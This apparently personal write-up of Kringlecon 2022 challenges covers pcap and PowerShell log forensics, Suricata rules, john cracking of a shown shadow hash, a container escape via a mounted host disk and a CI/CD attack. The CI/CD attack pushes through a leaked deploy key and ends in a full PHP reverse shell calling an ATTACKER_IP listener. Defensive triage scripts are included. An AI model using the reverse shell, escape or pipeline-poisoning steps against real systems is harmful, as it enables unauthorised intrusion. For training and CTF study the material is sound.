Kringlecon 22 and chatGPT fun
This is my write-up of a couple of Kringlecon 22 challenges. As an experiment I wanted to use ChatGPT as much as possible. It's a pretty cool tool to add to your arsenal, but it's far from perfect: if you don't know what you're doing, it will probably point you in the wrong direction; if you do know what you're doing, it speeds up your workflow by producing code and commands you can then fix (Suricata rule generation was nice; cracking shadow passwords was cool, but it didn't mention you have to run unshadow first, etc.).
Tolkien ring

PCAP Analysis
1. What type of objects can we export from the pcap? > HTTP
2. What is the filename of the largest file we can export? > app.php
3. What packet number starts the app.php file? > 687
4. What is the IP of the Apache server? > 192.185.57.242
5. What file is saved to the infected host? > Ref_Sept24-2020.zip
6. Attackers used bad TLS certificates in this traffic. Which countries were they registered to?
To find them, filter on tls.handshake.type == 11 (the Certificate handshake message), then, on packet 808:

1) Make sure "Allow subdissector to reassemble TCP streams" is enabled in the TCP protocol preferences.
2) Go to the packet that contains the TLS handshake message "Certificate".
3) In the packet detail pane, expand the TLS protocol.
4) Expand the "Certificate" TLS record.
5) Expand the "Certificate" handshake protocol.
6) Expand the list of certificates. There is now a list of certificate lengths and certificates (the list may contain only one). The first certificate is the server certificate, the second its signing CA, the third the CA that signed that CA, etc.
7) Right-click on the certificate you want to export.
8) Choose "Export Packet Bytes...".
9) Choose a filename and click Save.
Then convert the DER to PEM with openssl and decode it with openssl or an online tool (for a live investigation prefer a local tool: uploading an attacker's certificate to a web service tells the world what you are looking at). We then get the following info:

There are two bad certificates (the other ones are legitimate Microsoft certificates). We rinse and repeat for each and get the answer:
> Israel, South Sudan
7. Is the host infected? > Yes; see below for details.
File extraction:
We download the suspicious pcap, see some HTTP and copy the gzip-decompressed body as text:

Then we paste the following, together with the function below that holds the big atob string, into the dev console in Chrome/Firefox. (This executes part of the attacker's JavaScript in your browser: do it in an isolated analysis VM, or decode the base64 offline instead.)
function saveAs(blob, fileName) {
  let url = window.URL.createObjectURL(blob);
  let anchorElem = document.createElement('a');
  anchorElem.style = 'display: none';
  anchorElem.href = url;
  anchorElem.download = fileName;
  document.body.appendChild(anchorElem);
  anchorElem.click();
  document.body.removeChild(anchorElem);
  // On Edge, revokeObjectURL should be called only after
  // a.click() has completed, at least on EdgeHTML 15.15048
  setTimeout(function() {
    window.URL.revokeObjectURL(url);
  }, 1000);
}
This downloads 'Ref_Sept24-2020.zip', which contains a .scr file that Windows Defender flags.
DIE (Detect It Easy) tells us it's a RAR archive (probably a self-extracting RAR).
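The same extraction can be done offline without running any of the attacker's JavaScript. The block below is an added example (not the page's code and not the dropper itself): it inflates a gzip-encoded HTTP body, pulls the base64 literal out of the atob("...") call, decodes it and identifies the result by its magic bytes, listing ZIP members without extracting them. The sample response it builds is constructed here (a fake ZIP holding a fake "sample.scr"); the real app.php body is not on this page.

```python
import base64
import gzip
import io
import re
import zipfile

# File signatures worth recognising in a dropped payload.
MAGIC = {
    b"PK\x03\x04": "zip",
    b"Rar!\x1a\x07": "rar",
    b"MZ": "pe",
}

# Matches the base64 literal passed to atob("...") / atob('...').
ATOB_RE = re.compile(r"atob\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)")


def gunzip_if_needed(body: bytes) -> bytes:
    """HTTP bodies served with Content-Encoding: gzip start with 1f 8b; inflate them."""
    if body[:2] == b"\x1f\x8b":
        return gzip.decompress(body)
    return body


def extract_atob_payloads(js: str) -> list:
    """Base64-decode every atob("...") literal found in the script text."""
    payloads = []
    for match in ATOB_RE.finditer(js):
        payloads.append(base64.b64decode(re.sub(r"\s+", "", match.group(1))))
    return payloads


def identify(blob: bytes) -> str:
    """Classify a decoded blob by its leading magic bytes."""
    for magic, kind in MAGIC.items():
        if blob.startswith(magic):
            return kind
    return "unknown"


def zip_members(blob: bytes) -> list:
    """List archive members without extracting anything to disk."""
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        return zf.namelist()


def triage(http_body: bytes) -> dict:
    """Inflate the body, pull out atob() payloads and describe each one."""
    js = gunzip_if_needed(http_body).decode("utf-8", "replace")
    report = {"has_atob_dropper": "let byteCharacters = atob" in js, "payloads": []}
    for blob in extract_atob_payloads(js):
        entry = {"kind": identify(blob), "size": len(blob)}
        if entry["kind"] == "zip":
            entry["members"] = zip_members(blob)
        report["payloads"].append(entry)
    return report


def build_sample_response() -> bytes:
    """Constructed stand-in for the gzip-encoded app.php response (not the real capture)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("sample.scr", b"MZ" + b"\x00" * 64)  # fake PE header, not real malware
    b64 = base64.b64encode(buf.getvalue()).decode()
    js = (
        "function drop() {\n"
        f"  let byteCharacters = atob('{b64}');\n"
        "  // ... builds a Blob and calls saveAs(blob, 'Ref_Sept24-2020.zip')\n"
        "}\n"
    )
    return gzip.compress(js.encode())


if __name__ == "__main__":
    print(triage(build_sample_response()))
```

Feed triage() the raw body you copied out of Wireshark (or the bytes from "Export Objects"); because it only decodes and inspects, nothing from the payload ever runs.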

We extract the .scr with 7-Zip and get a couple of interesting files:

Selector.vbs just runs dsep.bat, which renames SLP.txt to hl.rar and extracts it with PLS.exe (presumably a renamed RAR extractor, given the e -p<password> syntax). The bat file tells us the password is "Version", so we do that step manually:
rename SLP.txt hl.rar
"PLS.exe" e -pVersion hl.rar
timeout 5
start fatless.vbs
timeout 4
del /f /q "hl.rar"
del /f /q "dsep.bat"
del /f /q "C:\Users\mycomp\Desktop\inst.exe"
@exit
Part 2: PowerShell logs
We filter by task category and notice the following:

With that, we understand that recipe.txt is what the attacker is after. Searching for recipe.txt shows events on 12/24/2022 involving recipe.txt and files being deleted.
Knowing this, we can apply a filter for events after 12/23/2022 to remove noise.
For question 3, I couldn't find the right command in Windows Event Viewer; the GUI abstracts away some of the information. Using grep on the exported log I managed to find the answer:

1. When did the attack occur? > 12/24/2022
2. What is the filename from which the attacker read secrets? > Recipe.txt
$foo = Get-Content .\Recipe| % {$_ -replace 'honey', 'fish oil'}
$foo | Add-Content -Path 'Recipe'

> Recipe.txt
6. Were any files deleted? > Yes
7. Was the file from 2) deleted? > No
8. What is the event ID of the logs that show the attacker's commands being run? > 4104
9. Is the secret ingredient compromised? > Yes
10. What is the secret ingredient? > honey
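Event Viewer hides most of this, so the practical move is to export the 4104 script-block events (Get-WinEvent on Microsoft-Windows-PowerShell/Operational, or wevtutil) and triage them as text. The block below is an added example, not the page's grep session: it filters 4104 events after a cutoff date, lists the files read, written and deleted, and recovers the original secret from a -replace call (the first argument is what the attacker overwrote). The event records are constructed here; the only line taken from the page is the attacker's Get-Content/Add-Content pair.

```python
import re
from datetime import datetime

# Constructed Script Block Logging (event ID 4104) records, not the challenge's export.
# Real events live in Microsoft-Windows-PowerShell/Operational; the script text is the
# field Event Viewer tends to truncate and grep / Get-WinEvent show in full.
SAMPLE_EVENTS = [
    ("2022-12-22T09:14:03", 4104, "Get-ChildItem C:\\Users\\Admin\\Documents"),
    ("2022-12-24T10:05:11", 4104, "$foo = Get-Content .\\Recipe| % {$_ -replace 'honey', 'fish oil'}"),
    ("2022-12-24T10:05:12", 4104, "$foo | Add-Content -Path 'Recipe'"),
    ("2022-12-24T10:06:40", 4104, "Remove-Item .\\Recipe.bak"),
    ("2022-12-24T10:06:41", 4103, "CommandInvocation(Remove-Item): \"Remove-Item\""),
]

READ_RE = re.compile(r"\bGet-Content\s+(?:-Path\s+)?['\"]?([^\s'\"|]+)", re.IGNORECASE)
WRITE_RE = re.compile(r"\b(?:Add-Content|Set-Content|Out-File)\s+(?:-Path\s+)?['\"]?([^\s'\"|]+)", re.IGNORECASE)
DELETE_RE = re.compile(r"\b(?:Remove-Item|del|erase|rm|ri)\s+(?:-Path\s+)?['\"]?([^\s'\"|]+)", re.IGNORECASE)
REPLACE_RE = re.compile(r"-replace\s+'([^']*)'\s*,\s*'([^']*)'", re.IGNORECASE)


def script_blocks(events, after):
    """Keep only 4104 script-block events strictly after the given ISO timestamp."""
    cutoff = datetime.fromisoformat(after)
    return [(ts, text) for ts, eid, text in events
            if eid == 4104 and datetime.fromisoformat(ts) > cutoff]


def _matches(blocks, pattern):
    return [m.group(1) for _, text in blocks for m in [pattern.search(text)] if m]


def files_read(blocks):
    return _matches(blocks, READ_RE)


def files_written(blocks):
    return _matches(blocks, WRITE_RE)


def files_deleted(blocks):
    return _matches(blocks, DELETE_RE)


def secret_swaps(blocks):
    """(original, replacement) pairs from -replace calls: the original is the leaked secret."""
    return [(m.group(1), m.group(2)) for _, text in blocks for m in [REPLACE_RE.search(text)] if m]


def attack_day(blocks):
    """Date of the first suspicious script block after the cutoff."""
    return blocks[0][0][:10] if blocks else None


def triage(events, after="2022-12-23T00:00:00"):
    blocks = script_blocks(events, after)
    return {
        "attack_day": attack_day(blocks),
        "read": files_read(blocks),
        "written": files_written(blocks),
        "deleted": files_deleted(blocks),
        "secret_swaps": secret_swaps(blocks),
    }


if __name__ == "__main__":
    print(triage(SAMPLE_EVENTS))
```

The regexes are deliberately loose (aliases like del/rm count as deletes) because attackers rarely type the canonical cmdlet; tighten them against your own baseline of 4104 noise.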
Suricata rules
My first rule, to match adv[.]epostoday[.]uk, was:
alert dns any any -> any any (msg:"Known bad DNS lookup, possible Dridex infection"; dns_query; content:"adv.epostoday.uk"; nocase; metadata:created_at 2019_05_15, updated_at 2019_05_15; classtype:trojan-activity; sid:1234; rev:1;)
For the second rule, to match 192[.]185[.]57[.]242, I decided to try the modern way and asked ChatGPT ( https://chat.openai.com/chat ):

This didn't work and I got:

So I submitted the error to ChatGPT:

This still didn't work. I tried http instead of the ip keyword and removed both flow and content; this matched 454 packets out of 681:
alert http 192.185.57.242 any -> $HOME_NET any (msg:"Investigate suspicious connections, possible Dridex infection"; sid:12345; rev:1;)
For the second indicator, we flagged 454 packet(s), but we expected 681. Please try again!
I wasn't sure what was missing and suspected I was matching traffic in one direction only. I asked ChatGPT:

That obviously didn't work but the error gave me the answer:

Bidirectional matching uses <> instead of ->, so we change our rule to:
alert http 192.185.57.242 any <> $HOME_NET any (msg:"Investigate suspicious connections, possible Dridex infection"; sid:12345; rev:1;)
The third rule being asked for is:
We heard that some naughty actors are using TLS certificates with a specific CN. Develop a Suricata rule to match and alert on an SSL certificate for heardbellith.Icanwepeh.nagoya. When your rule matches, the message (msg) should read Investigate bad certificates, possible Dridex infection

Hmm... a pretty good start this time. I changed it a bit using https://suricata.readthedocs.io/en/suricata-6.0.0/rules/tls-keywords.html and got:
alert tls $EXTERNAL_NET any -> $HOME_NET any (msg:"Investigate bad certificates, possible Dridex infection"; tls.cert_subject; content: "CN=heardbellith.Icanwepeh.nagoya";)
Which worked nicely for the challenge grader. (A real Suricata deployment will refuse to load a rule without a sid, so add sid, rev and classtype before shipping it.)
OK, one more to rule them all and in the darkness find them. Let's watch for one line from the JavaScript: let byteCharacters = atob Oh, and that string might be GZip compressed - I hope that's OK! Just in case they try this again, please alert on that HTTP data with message Suspicious JavaScript function, possible Dridex infection
ChatGPT returns the following for this prompt:
"Write a rule to watch for one line from the JavaScript: "let byteCharacters = atob" This string might be gzip compressed. Please alert on that HTTP data with message Suspicious JavaScript function, possible Dridex infection"
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"Suspicious JavaScript function, possible Dridex infection"; content:"let byteCharacters = atob"; flow:established,to_server; http_content_type; content: "text/javascript"; http_accept_encoding; content: "gzip";)
A nice start, but I had to change it to:
alert http any any -> any any (msg:"Suspicious JavaScript function, possible Dridex infection";file_data; content:"let byteCharacters = atob"; )
According to the docs, file_data inspects the decompressed HTTP body, so the match works even when the response is gzip-encoded (again, add a sid before using this in a real ruleset).
Elven ring
Git
I tried the below and got a permission denied error:

I tried orc_admin because browsing the repo at https://haugfactory.com/orcadmin turned up that user. Again, I tried ChatGPT.

That didn't work, so I went to the GitLab website and pressed the clone button to get the HTTP command:

Terminal prompts below to answer:


Container escape
The challenge drops us in a container jail. The goal is to escape and, presumably, read a flag somewhere. I tried ChatGPT but it was not super helpful; https://www.cyberark.com/resources/threat-research-blog/the-route-to-root-container-escape-using-kernel-exploitation gave me some pretty good tips towards getting this to work.
First I performed basic recon:

Then I asked ChatGPT:

I tried all of the above, but none of them worked.
Let's keep going with recon:

Connecting to that second IP on port 2222 asks us for samways's password. We can use hashcat or John the Ripper to try and crack it. The entry in /etc/shadow is:
samways:$6$BRdK69UoIKU9YNPO$fUAXgJXgm68OEASm0354QS/fFkhTHFkswGAT9mrJMY0L8vEw53Ija9lsisesYy0Ja4h/bg1M6fEfVbF3zzgCL.:19363::::::
A couple of prompts asking ChatGPT to crack our password:



What is a bit disappointing here is that ChatGPT didn't mention you need to unshadow the file first.
OK, so with all that said and done, we run:
unshadow.exe passwd.txt shadow.txt > unshadowed.txt
john.exe --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
After a while we end up with:

The password is samways... duh!
Unfortunately, SSHing to that machine with it didn't work.
Running ps, we see s6-supervise processes

We know running sudo su gets us root.
We look at our capabilities (the CapPrm/CapEff lines in /proc/self/status, which capsh --decode can turn into names):
grinchum-land:/home/samways# cat /proc/self/status

We check devices in /dev
grinchum-land:/home/samways# ls /dev
autofs loop0 nvram tty1 tty20 tty31 tty42 tty53 tty7 vcs5 vcsu3
btrfs-control loop1 ptmx tty10 tty21 tty32 tty43 tty54 tty8 vcs6 vcsu4
core loop2 ptp0 tty11 tty22 tty33 tty44 tty55 tty9 vcsa vcsu5
cpu loop3 pts tty12 tty23 tty34 tty45 tty56 ttyS0 vcsa1 vcsu6
cpu_dma_latency loop4 random tty13 tty24 tty35 tty46 tty57 uhid vcsa2 vda
cuse loop5 shm tty14 tty25 tty36 tty47 tty58 uinput vcsa3 vsock
fd loop6 snapshot tty15 tty26 tty37 tty48 tty59 urandom vcsa4 zero
full loop7 stderr tty16 tty27 tty38 tty49 tty6 vcs vcsa5
fuse mem stdin tty17 tty28 tty39 tty5 tty60 vcs1 vcsa6
input mqueue stdout tty18 tty29 tty4 tty50 tty61 vcs2 vcsu
kmsg net tty tty19 tty3 tty40 tty51 tty62 vcs3 vcsu1
loop-control null tty0 tty2 tty30 tty41 tty52 tty63 vcs4 vcsu2
A block device, vda, is exposed inside the container, so we mount /dev/vda on /mnt and find what looks like the host's root filesystem:
grinchum-land:/dev# ls /mnt/
bin dev home lib32 libx32 media opt root sbin sys usr
boot etc lib lib64 lost+found mnt proc run srv tmp var
/mnt/home shows the user jailer. Nice!
At this point we could try cracking the mounted /etc/shadow, or add our own user and hash to it. Instead I poked around /home/jailer and ran cat on the private SSH key:
grinchum-land:/dev# ls -al /mnt/home/jailer/.ssh/jail.key.priv
-rw-rw-rw- 1 root root 1555 Nov 3 23:36 /mnt/home/jailer/.ssh/jail.key.priv
grinchum-land:/dev# cat /mnt/home/jailer/.ssh/jail.key.priv
Congratulations!
You've found the secret for the
HHC22 container escape challenge!
.--._..--.
___ ( _'-_ -_.'
_.-' `-._| - :- |
_.-' `--...__|
.-' '--..___
/ `._ \
`. `._ one |
`. `._ /
'. `._ :__________....-----'
`..`---' |-_ _- |___...----..._
|_....--' `.`.
_...--' `.`.
_..-' _.'.'
.-' step _.'.'
| _.'.'
| __....------'-'
| __...------''' _|
'--''' |- - _ |
_.-''''''''''''''''''-._
_.' |\
.' _.' |
`._ closer |:.'
`._ _.' |
`..__ | |
`---.._.--. _| |
| _ - | `-.._|_.'
.--...__ | - _|
.'_ `--.....__ |
.'_ `--..__
.'_ `.
.'_ 082bb339ec19de4935867 `-.
`--..____ _`.
```--...____ _..--'
| - _ ```---.._.'
| - _ |
|_ - - |
| - _ |
| -_ -_|
| - _ |
| - _ |
| -_ -_|
Oh... Well OK then! As you can see, ChatGPT wasn't great there.

CI/CD pipeline
The prompt gives us the following:
Greetings Noble Player,
Many thanks for answering our desperate cry for help!
You may have heard that some evil Sporcs have opened up a web-store selling
counterfeit banners and flags of the many noble houses found in the land of
the North! They have leveraged some dastardly technology to power their
storefront, and this technology is known as PHP!
***gasp***
This storefront utilizes a truly despicable amount of resources to keep the
website up. And there is only a certain type of Christmas Magic capable of
powering such a thing… an Elfen Ring!
Along with PHP there is something new we've not yet seen in our land.
A technology called Continuous Integration and Continuous Deployment!
Be wary!
Many fair elves have suffered greatly but in doing so, they've managed to
secure you a persistent connection on an internal network.
BTW take excellent notes!
Should you lose your connection or be discovered and evicted the
elves can work to re-establish persistence. In fact, the sound of fans
and the sag in lighting tells me all the systems are booting up again right now.
Please, for the sake of our Holiday help us recover the Ring and save Christmas!
We do some recon again:
grinchum-land:~$ ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 208 64 ? Ss 00:09 0:00 /package/admin/s6/command/s6-svscan -d4 -- /run/service
root 15 0.0 0.0 212 64 ? S 00:09 0:00 s6-supervise s6-linux-init-shutdownd
root 16 0.0 0.0 200 4 ? Ss 00:09 0:00 /package/admin/s6-linux-init/command/s6-linux-init-shutdownd -c /run/s6/basedir -g 3000 -C -B
root 34 0.0 0.0 212 64 ? S 00:09 0:00 s6-supervise log-openssh-server
root 35 0.0 0.0 212 64 ? S 00:09 0:00 s6-supervise s6rc-fdholder
root 36 0.0 0.0 212 60 ? S 00:09 0:00 s6-supervise s6rc-oneshot-runner
root 37 0.0 0.0 212 64 ? S 00:09 0:00 s6-supervise svc-openssh-server
root 48 0.0 0.0 520 152 ? Ss 00:09 0:00 /package/admin/s6-2.11.1.2/command/s6-fdholderd -1 -i data/rules
root 51 0.0 0.0 188 4 ? Ss 00:09 0:00 /package/admin/s6/command/s6-ipcserverd -1 -- /package/admin/s6/command/s6-ipcserver-access -v0 -E -l0 -i data/rules -- /package/admin/s6/comman
samways 157 0.0 0.0 276 4 ? Ss 00:09 0:00 s6-log n30 s10000000 S30000000 T !gzip -nq9 /config/logs/openssh
samways 162 0.0 0.0 4716 3808 ? Ss 00:09 0:00 sshd.pam: /usr/sbin/sshd.pam -D -e -p 2222 [listener] 0 of 10-100 startups
samways 184 0.0 0.0 4732 3920 ? Ss 00:09 0:00 sshd.pam: samways [priv]
samways 186 0.0 0.0 4968 3080 ? S 00:09 0:00 sshd.pam: samways@pts/0
samways 187 0.0 0.0 2592 2212 pts/0 Ss 00:09 0:00 -bash
samways 190 0.0 0.0 1708 872 pts/0 R+ 00:11 0:00 ps aux

Running git clone on this, we can't resolve the domain.
We run ifconfig, notice that nmap is available on the host, and ask ChatGPT:

grinchum-land:/home/samways# nmap -sn 172.18.0.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-07 00:26 GMT
Nmap scan report for 172.18.0.1
Host is up (0.00013s latency).
MAC Address: 02:42:0A:F2:58:85 (Unknown)
Nmap scan report for wordpress-db.local_docker_network (172.18.0.87)
Host is up (0.000055s latency).
MAC Address: 02:42:AC:12:00:57 (Unknown)
Nmap scan report for wordpress.local_docker_network (172.18.0.88)
Host is up (0.000037s latency).
MAC Address: 02:42:AC:12:00:58 (Unknown)
Nmap scan report for gitlab.local_docker_network (172.18.0.150)
Host is up (0.000039s latency).
MAC Address: 02:42:AC:12:00:96 (Unknown)
Nmap scan report for grinchum-land.flag.net.internal (172.18.0.99)
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 1.86 seconds
An nmap scan on one of these IPs:
grinchum-land:~$ nmap 172.18.0.150
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-07 00:37 GMT
Nmap scan report for gitlab.local_docker_network (172.18.0.150)
Host is up (0.00037s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8181/tcp open intermapper
Nice; we now know the GitLab host's IP. Let's clone the repo:
grinchum-land:/home/samways# git clone http://172.18.0.150/rings-of-powder/wordpress.flag.net.internal.git
Cloning into 'wordpress.flag.net.internal'...
remote: Enumerating objects: 10195, done.
remote: Total 10195 (delta 0), reused 0 (delta 0), pack-reused 10195
Receiving objects: 100% (10195/10195), 36.49 MiB | 21.78 MiB/s, done.
Resolving deltas: 100% (1799/1799), done.
Updating files: 100% (9320/9320), done.
grinchum-land:/home/samways# ls
wordpress.flag.net.internal
grinchum-land:/home/samways/wordpress.flag.net.internal# ls
index.php wp-admin wp-config.php wp-links-opml.php wp-settings.php
license.txt wp-blog-header.php wp-content wp-load.php wp-signup.php
readme.html wp-comments-post.php wp-cron.php wp-login.php wp-trackback.php
wp-activate.php wp-config-sample.php wp-includes wp-mail.php xmlrpc.php
git log shows the following:
commit 37b5d575bf81878934adb937a4fff0d32a8da105 (HEAD -> main, origin/main, origin/HEAD)
Author: knee-oh <sporx@kringlecon.com>
Date: Wed Oct 26 13:58:15 2022 -0700
updated wp-config
commit a59cfe83522c9aeff80d49a0be2226f4799ed239
Author: knee-oh <sporx@kringlecon.com>
Date: Wed Oct 26 12:41:05 2022 -0700
update gitlab.ci.yml
commit a968d32c0b58fd64744f8698cbdb60a97ec604ed
Author: knee-oh <sporx@kringlecon.com>
Date: Tue Oct 25 16:43:48 2022 -0700
test
commit 7093aad279fc4b57f13884cf162f7d80f744eea5
Author: knee-oh <sporx@kringlecon.com>
Date: Tue Oct 25 15:08:14 2022 -0700
add gitlab-ci
commit e2208e4bae4d41d939ef21885f13ea8286b24f05
Author: knee-oh <sporx@kringlecon.com>
Date: Tue Oct 25 13:43:53 2022 -0700
big update
commit e19f653bde9ea3de6af21a587e41e7a909db1ca5
Author: knee-oh <sporx@kringlecon.com>
Date: Tue Oct 25 13:42:54 2022 -0700
whoops
commit abdea0ebb21b156c01f7533cea3b895c26198c98
Author: knee-oh <sporx@kringlecon.com>
Date: Tue Oct 25 13:42:13 2022 -0700
added assets
commit a7d8f4de0c594a0bbfc963bf64ab8ac8a2f166ca
Author: knee-oh <sporx@kringlecon.com>
Date: Mon Oct 24 17:32:07 2022 -0700
init commit
The whoops commit seems interesting; let's diff it against the "added assets" commit right before it:
# git diff e19f653bde9ea3de6af21a587e41e7a909db1ca5 abdea0ebb21b156c01f7533cea3b895c26198c98
Author: knee-oh <sporx@kringlecon.com>
diff --git a/.ssh/.deploy b/.ssh/.deploy
new file mode 100644
index 0000000..3f7a9e3
--- /dev/null
+++ b/.ssh/.deploy
@@ -0,0 +1,7 @@
+-----BEGIN OPENSSH PRIVATE KEY-----
+b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
+QyNTUxOQAAACD+wLHSOxzr5OKYjnMC2Xw6LT6gY9rQ6vTQXU1JG2Qa4gAAAJiQFTn3kBU5
+9wAAAAtzc2gtZWQyNTUxOQAAACD+wLHSOxzr5OKYjnMC2Xw6LT6gY9rQ6vTQXU1JG2Qa4g
+AAAEBL0qH+iiHi9Khw6QtD6+DHwFwYc50cwR0HjNsfOVXOcv7AsdI7HOvk4piOcwLZfDot
+PqBj2tDq9NBdTUkbZBriAAAAFHNwb3J4QGtyaW5nbGVjb24uY29tAQ==
+-----END OPENSSH PRIVATE KEY-----
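Review bot: an unencrypted OpenSSH private key must never be committed, and this hunk adds one as .ssh/.deploy; deleting the file in a later commit (the "whoops" commit here) does not remove it from history, where git log -p --all still shows it, so the key has to be treated as compromised and rotated on every host that trusts the matching public key, with deploy keys kept in the CI runner's secret store or a gitignored path instead of the tree.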
diff --git a/.ssh/.deploy.pub b/.ssh/.deploy.pub
new file mode 100644
index 0000000..8c0b43c
--- /dev/null
+++ b/.ssh/.deploy.pub
@@ -0,0 +1 @@
+ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIP7AsdI7HOvk4piOcwLZfDotPqBj2tDq9NBdTUkbZBri sporx@kringlecon.co
m
We try to SSH to the GitLab host:
grinchum-land:~$ ssh -i .ssh/deploy.pem sporx@172.18.0.150
sporx@172.18.0.150: Permission denied (publickey).
OK, that didn't work; let's try the WordPress host:
grinchum-land:~$ ssh -i .ssh/deploy.pem sporx@172.18.0.88
sporx@172.18.0.88's password:
grinchum-land:~$ ssh -i .ssh/deploy.pem 172.18.0.88
samways@172.18.0.88's password:
OK, that didn't work either...
Let's look for creds in WordPress:

No interesting creds as they're pulled from variables.
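Looking for creds one file at a time misses what the "whoops" commit shows: secrets that were committed and then deleted survive in history. A systematic pass is to dump the whole history as a diff (git log -p --all) and scan the added lines. The block below is an added example, not the page's own tooling: it walks a unified diff, flags added lines that look like private keys, AWS access keys or hard-coded password literals, and flags files under paths that should never be committed (.ssh, .aws, .env, id_* keys, .pem). The diff it scans is constructed with a fake key and password; it is not the repository's real history.

```python
import re

# Added-line patterns worth flagging. Constructed for this example; extend for your estate.
SECRET_PATTERNS = {
    "private_key": re.compile(r"-----BEGIN (?:OPENSSH |RSA |EC |DSA |ENCRYPTED )?PRIVATE KEY-----"),
    "aws_access_key": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "password_literal": re.compile(r"(?i)(?:password|passwd|secret|token)\w*['\"]?\s*[:=,]\s*['\"][^'\"]{4,}"),
}
# Paths that should never be committed at all, whatever the content.
SENSITIVE_PATHS = re.compile(r"(?:^|/)\.(?:ssh|aws)(?:/|$)|(?:^|/)\.env$|(?:^|/)id_(?:rsa|ed25519|ecdsa)$|\.pem$")


def scan_diff(diff_text):
    """Walk a unified diff and report secrets introduced on added (+) lines."""
    findings = []
    path = None
    for line in diff_text.splitlines():
        if line.startswith("+++ "):
            path = line[4:]
            if path.startswith("b/"):
                path = path[2:]
            if SENSITIVE_PATHS.search(path):
                findings.append({"path": path, "rule": "sensitive_path", "line": None})
        elif line.startswith("+"):
            added = line[1:]
            for rule, pattern in SECRET_PATTERNS.items():
                if pattern.search(added):
                    findings.append({"path": path, "rule": rule, "line": added.strip()})
    return findings


# Constructed diff with a fake key and password; not the repository's real history.
SAMPLE_DIFF = """\
diff --git a/.ssh/.deploy b/.ssh/.deploy
new file mode 100644
--- /dev/null
+++ b/.ssh/.deploy
@@ -0,0 +1,3 @@
+-----BEGIN OPENSSH PRIVATE KEY-----
+AAAAexamplekeymaterialexamplekeymaterial
+-----END OPENSSH PRIVATE KEY-----
diff --git a/wp-config.php b/wp-config.php
--- a/wp-config.php
+++ b/wp-config.php
@@ -1,2 +1,2 @@
-define('DB_PASSWORD', getenv('DB_PASSWORD'));
+define('DB_PASSWORD', 'hunter2hunter2');
"""


if __name__ == "__main__":
    for f in scan_diff(SAMPLE_DIFF):
        print(f"{f['rule']:16} {f['path']}  {f['line'] or ''}")
```

Pipe `git log -p --all` into scan_diff() to cover every branch and every deleted file; anything it flags has to be rotated, not just removed from the tree.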
Then I remembered this was about CI/CD deployments, so let's try to commit to the repo:
grinchum-land:/home/samways/wordpress.flag.net.internal# git status
On branch main
Your branch is up to date with 'origin/main'.
Changes not staged for commit:
(use "git add <file>..." to update what will be committed)
(use "git restore <file>..." to discard changes in working directory)
modified: readme.html
no changes added to commit (use "git add" and/or "git commit -a")
grinchum-land:/home/samways/wordpress.flag.net.internal# git add *
grinchum-land:/home/samways/wordpress.flag.net.internal# git commit test
error: pathspec 'test' did not match any file(s) known to git
grinchum-land:/home/samways/wordpress.flag.net.internal# git commit -m test
[main e042b3a] test
Committer: root <root@grinchum-land.flag.net.internal>
Your name and email address were configured automatically based
on your username and hostname. Please check that they are accurate.
You can suppress this message by setting them explicitly. Run the
following command and follow the instructions in your editor to edit
your configuration file:
git config --global --edit
After doing this, you may fix the identity used for this commit with:
git commit --amend --reset-author
1 file changed, 1 insertion(+)
grinchum-land:/home/samways/wordpress.flag.net.internal#
OK; I think I need to commit as sporx@kringlecon.com using that key; let's try that.


grinchum-land:~/myrepo$ git remote set-url origin ssh://sporx@172.18.0.150/rings-of-powder/wordpress.flag.net.internal.git
grinchum-land:~/sporx-clone$ cat .gitlab-ci.yml
stages:
  - deploy
deploy-job:
  stage: deploy
  environment: production
  script:
    - rsync -e "ssh -i /etc/gitlab-runner/hhc22-wordpress-deploy" --chown=www-data:www-data -atv --delete --progress ./ root@wordpress.flag.net.internal:/var/www/html
After reading the GitLab SSH docs at https://docs.gitlab.com/ee/user/ssh.html I ran the following:

Nice! Now we run:
git config --global user.email "sporx@kringlecon.com"
git config --global user.name "knee-oh"
git clone git@172.18.0.150:/rings-of-powder/wordpress.flag.net.internal.git
touch temp
git add *
git commit -m "evil commit"
git push
Awesome! We just pushed our commit, which the pipeline is now rsyncing into the web root.
Now we just need to push a reverse shell to pwn this. A simple PHP shell payload will do.
We launch a screen with a netcat listener:
screen
nc -nlvp 1234
Add our shell from ChatGPT:

Curl the site (to trigger the PHP code) and wait...
The above fcloses the socket after one command, so I asked ChatGPT:

And got the following code:
<?php
// PHP reverse shell (ChatGPT output, lightly fixed so it runs as pasted):
// the attacker side is the `nc -nlvp 1234` listener started in screen above.
$ip = 'ATTACKER_IP';   // CHANGE THIS to the listener's IP
$port = 1234;          // CHANGE THIS to the listener's port
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
    die("$errstr ($errno)");
}
// Send some context to the attacker first
$data = "User: " . get_current_user() . "\n";
$data .= "Directory: " . getcwd() . "\n";
$data .= "Shell: " . ($_SERVER['SHELL'] ?? 'unknown') . "\n\n";
fwrite($sock, $data);
// Read a command, run it and write the output back, until the listener disconnects
while (true) {
    fwrite($sock, "shell> ");
    $cmd = fread($sock, 1024);
    if ($cmd === false || $cmd === '') {
        break;                       // listener closed the connection
    }
    $output = shell_exec($cmd);
    fwrite($sock, (string) $output);
}
fclose($sock);

We look in / and find flag.txt; cat-ing it returns the Elven Ring!

Web Ring
Use the artifacts from Alabaster Snowball to analyze this attack on the Boria mines. Most of the traffic to this site is nice, but one IP address is being naughty! Which is it? Visit Sparkle Redberry in the Tolkien Ring for hints.
There are obvious mass hits on /login.html with POST requests, the indicator of a brute-force attack.
The bad IP is 18.222.86.32.
The first attack is a brute force login. What's the first username tried?
We use the following filter in Wireshark:
